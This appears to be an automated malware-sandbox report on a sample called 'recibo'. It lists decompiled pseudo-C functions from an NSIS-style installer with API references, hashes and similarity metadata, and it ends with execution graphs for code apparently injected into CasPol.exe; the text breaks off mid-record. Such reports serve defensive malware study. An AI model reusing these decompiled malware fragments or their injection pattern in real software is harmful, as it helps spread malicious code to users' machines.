                                                                                  					_t29 =  *_t74 & 0x0000ffff;
                                                                                  					_t67 = 2;
                                                                                  					_t74 = _t74 + _t67;
                                                                                  					_t88 = _t29 - 0x66;
                                                                                  					if(_t88 > 0) {
                                                                                  						_t30 = _t29 - 0x6c;
                                                                                  						if(_t30 == 0) {
                                                                                  							L23:
                                                                                  							_t31 =  *0x71545040;
                                                                                  							if( *0x71545040 == 0) {
                                                                                  								goto L26;
                                                                                  							}
                                                                                  							E71541603( *0x71545074, _t31 + 4, _t66);
                                                                                  							_t34 =  *0x71545040;
                                                                                  							_t86 = _t86 + 0xc;
                                                                                  							 *0x71545040 =  *_t34;
                                                                                  							L25:
                                                                                  							GlobalFree(_t34);
                                                                                  							goto L26;
                                                                                  						}
                                                                                  						_t36 = _t30 - 4;
                                                                                  						if(_t36 == 0) {
                                                                                  							L13:
                                                                                  							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                  							_t74 = _t74 + _t67;
                                                                                  							_t34 = E71541312(E7154135A(_t38));
                                                                                  							L14:
                                                                                  							goto L25;
                                                                                  						}
                                                                                  						_t40 = _t36 - _t67;
                                                                                  						if(_t40 == 0) {
                                                                                  							L11:
                                                                                  							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                  							_t74 = _t74 + _t67;
                                                                                  							_t34 = E71541381(_t80, E715412E3());
                                                                                  							goto L14;
                                                                                  						}
                                                                                  						L8:
                                                                                  						if(_t40 == 1) {
                                                                                  							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                                  							_t10 = _t81 + 4; // 0x4
                                                                                  							E71541603(_t10,  *0x71545074, _t66);
                                                                                  							_t86 = _t86 + 0xc;
                                                                                  							 *_t81 =  *0x71545040;
                                                                                  							 *0x71545040 = _t81;
                                                                                  						}
                                                                                  						goto L26;
                                                                                  					}
                                                                                  					if(_t88 == 0) {
                                                                                  						_t48 =  *0x71545070;
                                                                                  						_t77 =  *_t48;
                                                                                  						 *_t48 =  *_t77;
                                                                                  						_t49 = _v0;
                                                                                  						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                                  						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                                  							E71541603(_t49, _t77 + 8, 0x38);
                                                                                  							_t86 = _t86 + 0xc;
                                                                                  						}
                                                                                  						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                                  						GlobalFree(_t77);
                                                                                  						goto L26;
                                                                                  					}
                                                                                  					_t54 = _t29 - 0x46;
                                                                                  					if(_t54 == 0) {
                                                                                  						_t82 = GlobalAlloc(0x40,  *0x7154506c +  *0x7154506c + 8);
                                                                                  						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                                  						_t14 = _t82 + 8; // 0x8
                                                                                  						E71541603(_t14, _v0, 0x38);
                                                                                  						_t86 = _t86 + 0xc;
                                                                                  						 *_t82 =  *( *0x71545070);
                                                                                  						 *( *0x71545070) = _t82;
                                                                                  						goto L26;
                                                                                  					}
                                                                                  					_t63 = _t54 - 6;
                                                                                  					if(_t63 == 0) {
                                                                                  						goto L23;
                                                                                  					}
                                                                                  					_t64 = _t63 - 4;
                                                                                  					if(_t64 == 0) {
                                                                                  						 *_t74 =  *_t74 + 0xa;
                                                                                  						goto L13;
                                                                                  					}
                                                                                  					_t40 = _t64 - _t67;
                                                                                  					if(_t40 == 0) {
                                                                                  						 *_t74 =  *_t74 + 0xa;
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					goto L8;
                                                                                  					L26:
                                                                                  				} while ( *_t74 != 0);
                                                                                  				_t27 = _v0;
                                                                                  				goto L28;
                                                                                  			}



























                                                                                  APIs
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 71541171
                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 715411E3
                                                                                  • GlobalFree.KERNEL32 ref: 7154124A
                                                                                  • GlobalFree.KERNEL32(?), ref: 7154129B
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 715412B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23409278912.0000000071541000.00000020.00000001.01000000.00000004.sdmp, Offset: 71540000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23409236416.0000000071540000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409345991.0000000071544000.00000002.00000001.01000000.00000004.sdmp
                                                                                  • Associated: 00000001.00000002.23409401287.0000000071546000.00000002.00000001.01000000.00000004.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_71540000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Free$Alloc
                                                                                  • String ID:
                                                                                  • API String ID: 1780285237-0
                                                                                  • Opcode ID: 6076240114f08b7cd6b7b5571661c699460cd7abcd334bedd2f0696ce03abf8d
                                                                                  • Instruction ID: b4dcdfd5ad0d546127b6d3232fa3aee3dd48cdac401c3c5ccf543c05776262df
                                                                                  • Opcode Fuzzy Hash: 6076240114f08b7cd6b7b5571661c699460cd7abcd334bedd2f0696ce03abf8d
                                                                                  • Instruction Fuzzy Hash: A351A3BA518202DFE709CF7AD988A197BF8FB45315B215516FD5ADB210E730F900CB50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                  				signed int _t14;
                                                                                  				int _t17;
                                                                                  				void* _t24;
                                                                                  				intOrPtr* _t29;
                                                                                  				void* _t31;
                                                                                  				signed int _t32;
                                                                                  				void* _t35;
                                                                                  				void* _t40;
                                                                                  				signed int _t42;
                                                                                  
                                                                                  				_t29 = __edi;
                                                                                  				_t24 = __ebx;
                                                                                  				_t14 =  *(_t35 - 0x28);
                                                                                  				_t40 = __edx - 0x38;
                                                                                  				 *(_t35 - 0x10) = _t14;
                                                                                  				_t27 = 0 | _t40 == 0x00000000;
                                                                                  				_t32 = _t40 == 0;
                                                                                  				if(_t14 == __ebx) {
                                                                                  					if(__edx != 0x38) {
                                                                                  						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                                  					} else {
                                                                                  						E00402DA6(0x21);
                                                                                  						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp", "C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll", 0x400);
                                                                                  						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll");
                                                                                  					}
                                                                                  				} else {
                                                                                  					E00402D84(1);
                                                                                  					 *0x40adf0 = __ax;
                                                                                  					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                  				}
                                                                                  				 *(_t35 + 8) = _t17;
                                                                                  				if( *_t29 == _t24) {
                                                                                  					L13:
                                                                                  					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                  				} else {
                                                                                  					_t31 = E0040649D(_t27, _t29);
                                                                                  					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                                                  						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nsf321E.tmp\System.dll",  *(_t35 + 8));
                                                                                  						_t42 = _t14;
                                                                                  						if(_t42 == 0) {
                                                                                  							goto L13;
                                                                                  						}
                                                                                  					} else {
                                                                                  						goto L13;
                                                                                  					}
                                                                                  				}
                                                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                  				return 0;
                                                                                  			}













                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 00402695
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsf321E.tmp$C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll
                                                                                  • API String ID: 1659193697-3752121594
                                                                                  • Opcode ID: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
                                                                                  • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                  • Opcode Fuzzy Hash: a2d9691ea381e88d042a05527e8249a96b52758ce21b98351f65b3f5d82e54dc
                                                                                  • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00403019(intOrPtr _a4) {
                                                                                  				long _t2;
                                                                                  				struct HWND__* _t3;
                                                                                  				struct HWND__* _t6;
                                                                                  
                                                                                  				if(_a4 == 0) {
                                                                                  					__eflags =  *0x42aa20; // 0x0
                                                                                  					if(__eflags == 0) {
                                                                                  						_t2 = GetTickCount();
                                                                                  						__eflags = _t2 -  *0x434f0c;
                                                                                  						if(_t2 >  *0x434f0c) {
                                                                                  							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
                                                                                  							 *0x42aa20 = _t3;
                                                                                  							return ShowWindow(_t3, 5);
                                                                                  						}
                                                                                  						return _t2;
                                                                                  					} else {
                                                                                  						return E00406946(0);
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t6 =  *0x42aa20; // 0x0
                                                                                  					if(_t6 != 0) {
                                                                                  						_t6 = DestroyWindow(_t6);
                                                                                  					}
                                                                                  					 *0x42aa20 = 0;
                                                                                  					return _t6;
                                                                                  				}
                                                                                  			}







                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                  • GetTickCount.KERNEL32 ref: 0040304A
                                                                                  • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                  • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                  • String ID:
                                                                                  • API String ID: 2102729457-0
                                                                                  • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                  • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                  • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                  • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 89%
                                                                                  			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                  				int _t15;
                                                                                  				long _t16;
                                                                                  
                                                                                  				_t15 = _a8;
                                                                                  				if(_t15 != 0x102) {
                                                                                  					if(_t15 != 0x200) {
                                                                                  						_t16 = _a16;
                                                                                  						L7:
                                                                                  						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
                                                                                  							_push(_t16);
                                                                                  							_push(6);
                                                                                  							 *0x42d254 = _t16;
                                                                                  							E00404ED4();
                                                                                  						}
                                                                                  						L11:
                                                                                  						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
                                                                                  					}
                                                                                  					if(IsWindowVisible(_a4) == 0) {
                                                                                  						L10:
                                                                                  						_t16 = _a16;
                                                                                  						goto L11;
                                                                                  					}
                                                                                  					_t16 = E00404E54(_a4, 1);
                                                                                  					_t15 = 0x419;
                                                                                  					goto L7;
                                                                                  				}
                                                                                  				if(_a12 != 0x20) {
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				E004044E5(0x413);
                                                                                  				return 0;
                                                                                  			}






                                                                                  APIs
                                                                                  • IsWindowVisible.USER32(?), ref: 00405542
                                                                                  • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                    • Part of subcall function 004044E5: SendMessageW.USER32(0001043C,00000000,00000000,00000000), ref: 004044F7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                  • String ID:
                                                                                  • API String ID: 3748168415-3916222277
                                                                                  • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                  • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                  • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                  • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 90%
                                                                                  			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
                                                                                  				int _v8;
                                                                                  				long _t21;
                                                                                  				long _t24;
                                                                                  				char* _t30;
                                                                                  
                                                                                  				asm("sbb eax, eax");
                                                                                  				_v8 = 0x800;
                                                                                  				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
                                                                                  				_t30 = _a16;
                                                                                  				if(_t21 != 0) {
                                                                                  					L4:
                                                                                  					 *_t30 =  *_t30 & 0x00000000;
                                                                                  				} else {
                                                                                  					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
                                                                                  					_t21 = RegCloseKey(_a20);
                                                                                  					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
                                                                                  					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
                                                                                  						goto L4;
                                                                                  					}
                                                                                  				}
                                                                                  				return _t21;
                                                                                  			}








                                                                                  APIs
                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
                                                                                  • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsf321E.tmp\System.dll), ref: 0040645C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseQueryValue
                                                                                  • String ID: Call
                                                                                  • API String ID: 3356406503-1824292864
                                                                                  • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                  • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                  • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                  • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00403B57() {
                                                                                  				void* _t2;
                                                                                  				void* _t3;
                                                                                  				void* _t6;
                                                                                  				void* _t8;
                                                                                  
                                                                                  				_t8 =  *0x42b22c;
                                                                                  				_t3 = E00403B3C(_t2, 0);
                                                                                  				if(_t8 != 0) {
                                                                                  					do {
                                                                                  						_t6 = _t8;
                                                                                  						_t8 =  *_t8;
                                                                                  						FreeLibrary( *(_t6 + 8));
                                                                                  						_t3 = GlobalFree(_t6);
                                                                                  					} while (_t8 != 0);
                                                                                  				}
                                                                                  				 *0x42b22c =  *0x42b22c & 0x00000000;
                                                                                  				return _t3;
                                                                                  			}








                                                                                  APIs
                                                                                  • FreeLibrary.KERNEL32(?,77343420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                  • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                  Strings
                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: Free$GlobalLibrary
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                  • API String ID: 1100898210-3355392842
                                                                                  • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                  • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                  • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                  • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                                                                  				int _v8;
                                                                                  				int _t12;
                                                                                  				int _t14;
                                                                                  				int _t15;
                                                                                  				CHAR* _t17;
                                                                                  				CHAR* _t27;
                                                                                  
                                                                                  				_t12 = lstrlenA(_a8);
                                                                                  				_t27 = _a4;
                                                                                  				_v8 = _t12;
                                                                                  				while(lstrlenA(_t27) >= _v8) {
                                                                                  					_t14 = _v8;
                                                                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                                                                  					_t15 = lstrcmpiA(_t27, _a8);
                                                                                  					_t27[_v8] =  *(_t14 + _t27);
                                                                                  					if(_t15 == 0) {
                                                                                  						_t17 = _t27;
                                                                                  					} else {
                                                                                  						_t27 = CharNextA(_t27);
                                                                                  						continue;
                                                                                  					}
                                                                                  					L5:
                                                                                  					return _t17;
                                                                                  				}
                                                                                  				_t17 = 0;
                                                                                  				goto L5;
                                                                                  			}










                                                                                  APIs
                                                                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                  • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                  • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.23383250839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.23383193231.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383367093.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383431506.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383724604.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383783900.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383856333.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383921037.0000000000469000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000001.00000002.23383984080.000000000046B000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_recibo.jbxd
                                                                                  Similarity
                                                                                  • API ID: lstrlen$CharNextlstrcmpi
                                                                                  • String ID:
                                                                                  • API String ID: 190613189-0
                                                                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                  • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                  • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Execution Graph

                                                                                  Execution Coverage:24.9%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:4
                                                                                  Total number of Limit Nodes:1
                                                                                  execution_graph 16382 d14d4d 16383 d01657 16382->16383 16384 d14c01 TerminateThread 16383->16384 16385 d14da6 16383->16385 16384->16383
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0ae943f1b1d16332a0eff172fb25f52209ef88b0bad0d6816f1174daed237b23
                                                                                  • Instruction ID: df496105be97be67d29174863df86ab0e4081c0fc3c72d03624e5007316bebf0
                                                                                  • Opcode Fuzzy Hash: 0ae943f1b1d16332a0eff172fb25f52209ef88b0bad0d6816f1174daed237b23
                                                                                  • Instruction Fuzzy Hash: 78B18E71E047098FDB40CFA5CA857AEBBF2BF48354F548629D405A7354EB749846CF82
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 d14c01-d14c35 TerminateThread call d006a9 3 d14de5 0->3 4 d14c3b-d14c8c 0->4 6 d14dea-d14e05 3->6 4->3 8 d14c92-d14c96 4->8 8->3 9 d14c9c-d14ca0 8->9 9->3 10 d14ca6-d14caa 9->10 10->3 12 d14cb0-d14cb4 10->12 12->3 13 d14cba-d14cbe 12->13 13->3 14 d14cc4-d14cd6 13->14 14->3 16 d14cdc-d14d29 14->16 18 d14d2a-d14d39 16->18 19 d14d55-d14da5 18->19 20 d14d3b-d14d44 18->20 24 d01657-d01672 19->24 25 d14da6-d14dd3 19->25 20->3 22 d14d4a-d14d4b 20->22 22->18 24->0 30 d14dd5-d14de0 25->30 31 d14de7 25->31 31->6
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28050906366.0000000000D00000.00000040.00000400.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_d00000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID: TerminateThread
                                                                                  • String ID: Q
                                                                                  • API String ID: 1852365436-3463352047
                                                                                  • Opcode ID: e011db77c84532eedb2634e8ac3f2a0d69d185ad2c61d308f7092a8b470d75ab
                                                                                  • Instruction ID: 310c264ef1453da6aaa54713bb38d9eb530f873d7a9bef130c2ae592f5966e95
                                                                                  • Opcode Fuzzy Hash: e011db77c84532eedb2634e8ac3f2a0d69d185ad2c61d308f7092a8b470d75ab
                                                                                  • Instruction Fuzzy Hash: F1315A38640307AFDF245AA8A8A47E273A29F12365FDC8267C8948B196D739C8C5C612
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: \VSn$\VSn
                                                                                  • API String ID: 0-668133529
                                                                                  • Opcode ID: c73ce18e47deb4b3874db41efa80e4de84a056aef6c66d7159e38716e215b47e
                                                                                  • Instruction ID: ea3e0b1afbacd0af32f27491e135dddade60971f5b3e85eb49c61450e8f4bdb8
